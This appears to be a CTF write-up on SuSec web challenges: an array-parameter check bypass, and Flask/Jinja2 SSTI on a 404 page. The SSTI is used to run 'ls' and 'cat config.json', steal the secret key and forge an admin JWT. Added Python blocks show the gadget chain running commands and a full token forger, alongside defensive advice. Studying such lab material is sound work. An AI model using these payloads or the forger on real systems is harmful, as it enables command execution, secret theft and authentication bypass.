SuSec CTF write-up

2020. 3. 17. 17:34


2018, @Yeouido Hangang Park, Seoul, Korea


Sorry for my bad English, foreigners lol :0






We can get the source, which uses the Node.js Express framework. There is a check in the POST handler that compares the 'first' and 'second' parameters. Send arrays as 'first' and 'second' and you get the flag!








We can access a very simple web service: you can log in, get the flag, and change the theme of the service. After many tries at attacking the JWT token, I found an SSTI on the 404 page.




As soon as I found this, I really screamed. For real. It was a waste of time to try to attack the JWT authentication. Just keep going with the SSTI.




[*] url : {{config.__class__.__init__.__globals__['os'].popen('ls -al').read()}}


Okay, we can use the SSTI to run commands. The gadget works because `config` is Flask's Config object, a Python-defined class whose `__init__` lives in a module that imports `os`, so `__init__.__globals__['os']` hands us the os module and `popen(...).read()` returns the command output in the page.
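The gadget chain above, shown in plain Python as an added example (not code from the challenge or the write-up). Jinja2 and Flask are not used here; `Config` is a stand-in for `flask.Config` that reproduces the one property the payload relies on, a Python-defined `__init__` in a module that has imported `os`. A built-in type such as a plain `dict` has no such `__globals__`, which is why `config` in particular is useful as a starting point.

```python
import os


class Config(dict):
    """Stand-in for flask.Config (assumption for this example): a dict subclass
    whose __init__ is a Python function defined in a module that imported os.
    flask/config.py has the same shape, which is what the SSTI payload exploits."""

    def __init__(self, root_path=None):
        super().__init__()
        self.root_path = root_path


# Object the template context exposes as `config` in the challenge.
config = Config("/app")


def has_gadget(obj):
    """True if obj.__class__.__init__ is a Python function carrying __globals__.
    Built-in classes (dict, str, ...) expose a slot wrapper here instead, which
    has no __globals__, so the same chain fails on them."""
    return hasattr(obj.__class__.__init__, "__globals__")


def os_via_globals(obj):
    """Walk the chain from the payload: config -> class -> __init__ -> module
    globals -> os. Mirrors {{config.__class__.__init__.__globals__['os']}}."""
    return obj.__class__.__init__.__globals__["os"]


def run_via_gadget(obj, command):
    """Equivalent of {{...__globals__['os'].popen(command).read()}}: run the
    command through a shell and return its stdout as a string."""
    return os_via_globals(obj).popen(command).read()


if __name__ == "__main__":
    print("gadget on config:", has_gadget(config))   # True
    print("gadget on dict:", has_gadget({}))          # False
    print(run_via_gadget(config, "echo ssti works"))
```

The lesson for defenders is the same as in the write-up: any user-controlled string reaching `render_template_string` (a 404 page that echoes the requested path is the classic case) gives the attacker the whole object graph, and the fix is to pass the value as a template variable rather than as template source.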




[*]{{config.__class__.__init__.__globals__['os'].popen('cat config.json').read()}}


That gives us the secret key of this service. Now sign your own JWT with it, with admin as the identity.




[*] payload : eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQyNzkxMjAsIm5iZiI6MTU4NDI3OTEyMCwianRpIjoiNzEwZTJiMjQtZjUzYy00NmQ1LWFjMTgtMTMwODUyNDllNWNhIiwiaWRlbnRpdHkiOiJhZG1pbiIsImZyZXNoIjpmYWxzZSwidHlwZSI6ImFjY2VzcyJ9.s3ppGGNMSIQc4HBbhBFb5TjxdBBqVAo0jKD_nhH8RBY
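How that token was forged, as an added example (not the write-up's own script). Decoding the token above shows an HS256 header and a flask-jwt-extended style payload (`iat`, `nbf`, `jti`, `identity`, `fresh`, `type`), so the forger below builds the same claim set and signs it with HMAC-SHA256 using only the standard library. The real secret from config.json is not on the page; `LEAKED_SECRET` is a placeholder.

```python
import base64
import hashlib
import hmac
import json
import time
import uuid

# Token from the write-up. Its payload is readable without any key; only the
# signature needed the leaked secret.
ORIGINAL_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJpYXQiOjE1ODQyNzkxMjAsIm5iZiI6MTU4NDI3OTEyMCwianRpIjoiNzEwZTJiMjQtZjUzYy00"
    "NmQ1LWFjMTgtMTMwODUyNDllNWNhIiwiaWRlbnRpdHkiOiJhZG1pbiIsImZyZXNoIjpmYWxzZSwi"
    "dHlwZSI6ImFjY2VzcyJ9.s3ppGGNMSIQc4HBbhBFb5TjxdBBqVAo0jKD_nhH8RBY"
)

# Placeholder: the actual secret read via the SSTI is not shown in the write-up.
LEAKED_SECRET = "secret-from-config-json"


def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_unverified(token):
    """Return (header, claims) without checking the signature."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def sign_hs256(secret, header, claims):
    """Build header.payload and append HMAC-SHA256(secret, header.payload)."""
    compact = lambda obj: b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = compact(header) + "." + compact(claims)
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def forge_access_token(secret, identity="admin", now=None):
    """Mint a token with the same claim layout as the one in the write-up."""
    now = int(time.time()) if now is None else now
    header = {"typ": "JWT", "alg": "HS256"}
    claims = {
        "iat": now,
        "nbf": now,
        "jti": str(uuid.uuid4()),
        "identity": identity,
        "fresh": False,
        "type": "access",
    }
    return sign_hs256(secret, header, claims)


def verify_hs256(token, secret):
    """Server-side check: pin the algorithm, recompute the MAC, compare in
    constant time. Returns the claims on success, None otherwise."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    print("original claims:", decode_unverified(ORIGINAL_TOKEN)[1])
    forged = forge_access_token(LEAKED_SECRET)
    print("forged:", forged)
    print("verifies with leaked secret:", verify_hs256(forged, LEAKED_SECRET) is not None)
```

Nothing about the JWT itself was broken here: HS256 with a strong secret is fine, and the earlier attempts on the token failed for that reason. The whole attack is secret disclosure through the SSTI, which is why a symmetric-key JWT setup is only as safe as every file the application can read.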




Haha, we got the flag!!